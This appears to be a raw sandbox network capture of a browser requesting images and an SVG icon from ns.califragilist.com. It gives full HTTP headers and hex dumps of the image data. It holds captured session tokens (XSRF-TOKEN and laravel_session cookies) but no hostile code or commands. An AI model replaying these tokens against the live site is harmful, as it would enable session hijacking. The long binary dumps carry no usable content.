                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1065INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzH6jTgdT054L%2BPKI%2BH7GLYv687T6QhsrkMWpidKeSQmluA57jWEIVecedryoW5sOudmwZDMj9Mtou82pL08VW1N9td3HdSWxFwN2H38BnIv83iyXpnvWJmECN%2Bg3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3410&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2293&delivery_rate=815544&cwnd=251&unsent_bytes=0&cid=77c990b8752dcaf5&ts=126&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64582fb585207-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19124&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1952&delivery_rate=151187&cwnd=32&unsent_bytes=0&cid=cb0cf2733ec736bc&ts=426&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                                                                              Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                                                                              2024-11-06 15:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              84192.168.2.1849871188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:04 UTC1105OUTGET /qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1010INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 892
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1k9mVmMPAR7XxUeR3q1%2Bl9ynmLBfUbL2LHnjrGBx7YjGiVj0fQbNkiBRUF%2BHYeGrUohqwIvPmHfrY00fQXWQDH8OMaMlnXP7XJ%2BLZjGIUPXmhAASktfwg%2F06cNlXrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3291&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2027&delivery_rate=842105&cwnd=242&unsent_bytes=0&cid=d731579a61c7cb16&ts=129&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645830dcd345b-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1044&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1683&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=cfb30d5d01469488&ts=518&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC359INData Raw: 52 49 46 46 74 03 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 2f 00 00 2f 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFtWEBPVP8X0//ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:05 UTC533INData Raw: 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 3d 01 00 00 0d 80 96 6d 5b dd e6 9d 83 48 c0 41 bf 29 18 55 10 a2 80 d6 41 a3 a0 43 01 75 40 ab 20 89 82 11 07 4c c1 90 80 83 9e 0b 1f 3b ff 8b 08 05 92 24 33 7b 32 7b 2e f0 09 fc 33 a4 a1 56 36 08 69 de 57 c2 46 df 68 a2 e6 65 65 5e 6b ac 3a c0 cf 63 6c 88 5a da aa 65 62 d7 01 c9 04 00 29 84 49 5a 1a 9e b9 c5 21 ac 1f 18 b1 3b 58 e5 3a 26 03 a9
                                                                                                                                              Data Ascii: $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH=m[HA)UACu@ L;$3{2{.3V6iWFhee^k:clZeb)IZ!;X:&


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              85192.168.2.1849872188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:04 UTC1380OUTGET /ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1042INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 25216
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OQ%2BbLRLO3S7dZ8Wsm4cpU1CIdvdZKrR60oChYUOtsUYC%2FXk%2Flr4Mp3fF6PblvEgcdc79DR%2Fa6Tcn9rVsSw5ca822BIoxcV1414y5ZvpKHomXR4j5W2UVrT1%2BhtTzdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3411&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2302&delivery_rate=854781&cwnd=247&unsent_bytes=0&cid=2e173fe9838ddab0&ts=76&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64583485f2cc4-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1958&delivery_rate=1773423&cwnd=241&unsent_bytes=0&cid=a281a9aee0e3afbd&ts=498&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC327INData Raw: 52 49 46 46 78 62 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 6f 08 00 ba 01 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFxbWEBPVP8X0oICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 a0 59 00 00 01 ff 27 24 48 f0 ff 78 6b 44 a4 ee e1 8f ff 6f 55 53 fa ff 5b d7 75 4d 07 03 c3 d0 43 77 49 a3 48 23 dd 48 a7 74 28 1d 0e 21 4a 8b 41 4a 23 20 a1 28 8d 84 d2 1d d2 dd cd 90 13 30 1d 57 ac 3f 44 e6 9a b5 d6 de 67 e6 36 af eb 75 8b e8 ff 04
                                                                                                                                              Data Ascii: 8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHY'$HxkDoUS[uMCwIH#Ht(!JAJ# (0W?Dg6u
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 20 65 de fe 3b 92 f5 e0 c9 bc fa 6e 20 a4 b9 fe 86 64 19 f0 ac a7 0b 98 ec cf 50 c4 73 fd bd 41 d4 ac 3d 76 24 a9 ee c1 bc 1a 26 10 35 67 c8 03 11 70 9e eb 17 f3 1e 14 d0 ba a6 14 08 9c f9 b3 83 76 75 85 ce 2c 03 02 5b da 5f 92 00 db ba 7c 99 88 fc 93 d7 14 03 a9 83 43 ee 28 29 71 47 7b 37 90 ba fe 29 01 de 14 72 f1 52 db c6 2e f1 a7 bc 20 b9 a9 c6 f2 28 d5 9c 1c 90 19 44 6f 78 82 1d 9e f5 74 e9 92 fd 19 72 df 57 12 c4 f7 ea 71 55 21 89 1b 3e 04 f9 5b 3c e0 86 f3 5d b9 98 f7 20 f3 eb 0d 40 89 a6 86 3b ed 6a 78 36 21 1b 28 d1 fb eb 38 66 d8 d6 85 cb e7 c8 fb cd 50 37 50 66 d1 79 51 f2 9d ee ec 0e ca cc bb 9e 59 58 76 97 2d f9 63 78 ed ce 03 4a cd 34 f4 81 68 f6 cd 1f 82 5a 5b be 60 85 7f b8 6a 31 fd 8d 9c a3 fa 9b 40 b5 e6 f6 b7 c4 b2 ef a8 00 ca cd bc 94
                                                                                                                                              Data Ascii: e;n dPsA=v$&5gpvu,[_|C()qG{7)rR. (DoxtrWqU!>[<] @;jx6!(8fP7PfyQYXv-cxJ4hZ[`j1@
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 32 d4 c5 98 63 f3 ba 06 a7 07 99 4e 23 f9 b7 d9 74 a6 1f d2 ef 62 cc 72 d8 89 25 e5 50 d5 40 64 9c d8 02 8c e5 54 6a bf ea 5d 91 49 f7 50 85 97 c6 e7 4b 23 29 69 d3 86 77 de ff a5 57 91 f4 9e f6 c8 70 a6 c6 78 be 64 70 d7 64 c8 7a 23 f1 df 40 d1 35 92 18 25 34 01 83 99 d7 4a 2c d2 5d df b2 7c 7e 12 95 69 df df dd 27 2d 64 1a ea e7 d3 65 ad fd d2 73 b6 73 b8 a7 31 2d 90 63 79 43 b6 95 5a 75 45 e5 7e 81 7c e3 1a 80 e1 dc 4c 0c eb ea 5a a5 15 f1 a8 d6 a8 25 65 d3 3e 8e 68 08 22 26 ee 1d 5e 34 dd e6 15 07 f4 d7 97 e9 2c 7a 1a 31 ef 58 62 97 40 cd 96 43 c8 37 b6 2e 18 cf 4f a8 cd d1 32 af 1e a7 51 c5 47 3a ba a7 71 dc d4 93 7f 5f 1a 57 30 5d c6 cd c1 22 9f be ac 64 31 dc 88 35 43 e2 fd 15 35 05 f9 46 d7 04 03 6a ba 41 ec 9e 86 05 4d 0d 43 55 3f 1d e5 9f a6 f1
                                                                                                                                              Data Ascii: 2cN#tbr%P@dTj]IPK#)iwWpxdpdz#@5%4J,]|~i'-dess1-cyCZuE~|LZ%e>h"&^4,z1Xb@C7.O2QG:q_W0]"d15C5FjAMCU?
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 42 de 3d 1b 11 97 c0 7b fe c7 5d 33 00 14 b0 fd d7 49 52 a7 94 51 ca ca e2 1b 30 ec 35 68 75 54 5c c0 4d 34 9c 8e 56 e9 3e f8 30 57 46 96 e4 2b 88 d8 0c 00 66 21 e2 ed 98 7f 3d 24 b5 46 19 7b 91 e3 49 37 e3 96 83 d6 70 b5 99 77 a2 01 8d 2c 98 ee 83 17 7d 33 b2 f4 44 c4 3d 00 7e 6f 10 71 60 14 22 9a 12 48 4d 56 45 4b e4 18 5d 18 0c 7c 1c a9 ef d4 36 1d 0d e9 71 4b ba 0f 6e 30 65 60 f1 7c 8e e8 28 09 9f 23 62 98 f7 bf 02 91 f4 40 45 78 de 65 d1 1b 8c fc 5d 52 6b 95 d6 ce 61 4c 70 7c fa 0f 8e cb c0 02 e3 11 71 91 e9 26 22 4e 86 7f 95 a6 d5 4a 11 23 90 e3 66 30 f4 c7 48 ed 57 59 d9 18 94 de f6 e4 e4 8e 5f 66 4f 08 f9 b2 7f ff c1 21 e3 66 ce 5c b4 ee e0 b5 30 15 24 57 4c ff b1 37 cd c0 12 18 8b 18 db 09 11 13 b2 bf a3 3e ad aa 6a c8 12 c1 e1 79 90 b1 fb 83 d4
                                                                                                                                              Data Ascii: B={]3IRQ05huT\M4V>0WF+f!=$F{I7pw,}3D=~oq`"HMVEK]|6qKn0e`|(#b@Exe]RkaLp|q&"NJ#f0HWY_fO!f\0$WL7>jy
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 2b 66 a7 37 19 14 6f ee 1f 89 c4 b7 8b 76 9e d4 74 a5 74 42 f6 51 55 40 b5 59 2e 72 c3 86 69 7d e0 b5 47 00 1c 99 a1 25 82 54 7f c9 96 22 f9 17 7e 8a 2b 73 1c c9 db 8b 49 76 93 d4 57 4a 39 c3 2e b1 1e a8 37 db 5d 6e df a7 f9 81 f7 5e 01 1e 5a 32 b2 84 92 1a 26 58 8e 04 7a 03 40 e9 de 33 92 91 e1 62 c9 1e 91 1a a5 92 5a c8 dd de 01 54 5c 22 92 d9 a6 b4 3f f0 3e c8 0f db 66 64 b9 4b 6a 9c 60 93 90 fc 0d 37 a5 35 ba 8f 2c e3 82 04 7b 4d ea 73 95 6c 63 37 02 d4 5c 3f 99 d7 41 55 64 ab dc 76 c4 9c 35 3b 4f dd 0e 8f 8c 46 c4 84 c8 c8 a7 b7 4f ed 5a 33 37 a4 d3 c7 b9 4d 46 0f 32 5d e4 77 4c be 4c e5 5a 0e 9d b5 76 f7 e9 bb 91 91 6f 11 13 23 23 1f 5d de ff db bc d1 6d 3e f0 d5 31 8f 62 0d fa 4e 5b b5 fd f8 cd 57 91 91 76 b4 45 46 86 de 3c b6 75 f9 e4 9e b5 82 4d
                                                                                                                                              Data Ascii: +f7ovttBQU@Y.ri}G%T"~+sIvWJ9.7]n^Z2&Xz@3bZT\"?>fdKj`75,{Mslc7\?AUdv5;OFOZ37MF2]wLLZvo##]m>1bN[WvEF<uM
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 5a 22 cf 82 84 3e a4 55 51 a4 d9 48 fd 92 49 31 e6 41 6f 50 54 6b 1e 91 7e 21 75 42 15 9d 90 73 6c b0 26 64 09 4f 9d 3b 63 73 83 dc 1f ec 41 e1 df 8c f1 34 48 45 93 58 61 15 4e d9 d7 39 50 60 fb 34 f3 7f 99 93 38 9c e7 53 fd 1a 8a bc 29 93 a2 02 57 38 50 e2 97 75 04 b9 c0 e7 a9 59 88 f5 4c ca 12 2a 4c ab 91 44 1e 61 e4 ba 82 5a 3f 38 89 d2 4e 14 69 27 a9 3f 55 b1 99 d5 34 d0 c5 a1 a9 10 fb 4b 4d 13 c8 1d b8 cc 86 f2 3f 6c 63 8c e0 7b 5e df f2 31 f5 8d 40 a1 ff cc f4 1f 99 90 e3 4d 2e 99 17 db 51 e8 5b a5 95 d4 f9 25 0a 6d 1d 63 12 e3 0a 1f ac 23 83 db 1b 26 41 84 02 68 75 95 a8 1d 52 7f ec ae 14 9f ef 92 51 dc c7 16 89 4e 93 5a a9 08 bf 78 4e 11 99 b5 c1 fd 96 b3 4e f5 cb 04 92 77 7b 85 6a dc 9e cf 10 65 8e 64 75 8b 4d e1 a3 28 f7 f5 bc ea 69 fe 1c e5 8e
                                                                                                                                              Data Ascii: Z">UQHI1AoPTk~!uBsl&dO;csA4HEXaN9P`48S)W8PuYL*LDaZ?8Ni'?U4KM?lc{^1@M.Q[%mc#&AhuRQNZxNNw{jeduM(i
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 1f d4 b5 e1 8c 6e f0 aa 89 3c b7 02 f9 8a b4 16 4b 92 39 89 98 35 87 60 cd 1f a1 72 57 49 e2 91 4c ea 90 12 cc 71 7c 96 83 e1 76 ff 1b b5 d2 de c5 a8 c0 0a 46 a3 09 e4 7f 8e 46 a2 78 04 1a 09 f3 16 d4 b6 02 8c b0 00 ab 29 4c fa d1 f3 b1 93 3a 22 c9 67 48 7c 07 88 9d 7b 23 2a f8 b5 45 90 52 48 7a 91 12 8a 22 df 8e 86 cb b4 1a 35 33 a9 be 51 e9 c2 68 65 ea 65 ba 8e 46 22 f0 1e 1a 8a ef 51 df e0 22 a3 41 ac 4e f2 70 04 d3 83 87 a4 de 98 04 f9 93 5a 5b a9 cc 83 a3 50 c9 35 04 e9 4c 6b a8 12 5a f3 71 e4 30 5c d3 51 3b a3 ca 1b 94 3c 8c 4e a7 9a 69 2b 1a 09 f3 6e 34 14 ed 1d 3a 37 89 d1 9f 9c 02 ac 3c 2e 02 c3 dd a4 b0 98 1c 3e f1 c4 22 3c 85 2a ff 0f 2a fa 07 41 66 d1 6a a0 84 af f8 5c 03 a3 3d 00 35 f4 59 7e 63 02 77 f9 44 a5 da 04 34 14 93 d0 50 94 8c 46 9d
                                                                                                                                              Data Ascii: n<K95`rWILq|vFFx)L:"gH|{#*ERHz"53QheeF"Q"ANpZ[P5LkZq0\Q;<Ni+n4:7<.>"<**Afj\=5Y~cwD4PF
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 90 df 04 ef eb 5e ac c5 d7 07 13 d4 e1 f3 42 16 eb a9 19 6d cb 7a c2 7b e7 ae f3 f9 ef 2f 95 51 81 d1 3c 06 4b 78 dc 01 c6 e3 68 61 09 7e c7 89 55 92 64 89 1c d1 c3 2c e0 d4 71 b4 b0 3d bf 99 b4 ac 7e 6a a8 c5 a7 bf 41 72 bf 27 c6 9b ad 83 4b 82 13 b3 b4 59 70 43 0c 9c 66 2c e6 f0 69 e5 0c af 57 a2 5c 99 ff 69 10 38 31 eb a7 f3 ae 28 e3 a2 24 d7 c6 56 b2 80 73 bd ea fe f0 4c 11 83 51 d0 88 45 4d fd c1 c9 a5 87 9e 52 03 3c e2 73 87 c1 7d 1e 73 38 d5 20 36 82 9d 6f 12 ad 17 26 49 ba 88 b1 25 18 9c 5c 96 d8 12 7e 97 69 fd 03 6a ac cf a7 bb 41 1a 80 32 26 fe d1 c4 02 ce 2f f8 cd 03 21 62 b2 1b 8a ef f8 b4 77 46 1f 94 f3 de a4 22 90 8a 45 be b9 ab 84 da 28 66 d8 dc 8a 90 aa 96 46 eb e2 15 60 be 2d 86 75 7b 5b 4f 48 d5 62 53 9f a8 60 1e 1f 2c 42 ae 10 f2 6c c0
                                                                                                                                              Data Ascii: ^Bmz{/Q<Kxha~Ud,q=~jAr'KYpCf,iW\i81($VsLQEMR<s}s8 6o&I%\~ijA2&/!bwF"E(fF`-u{[OHbS`,Bl
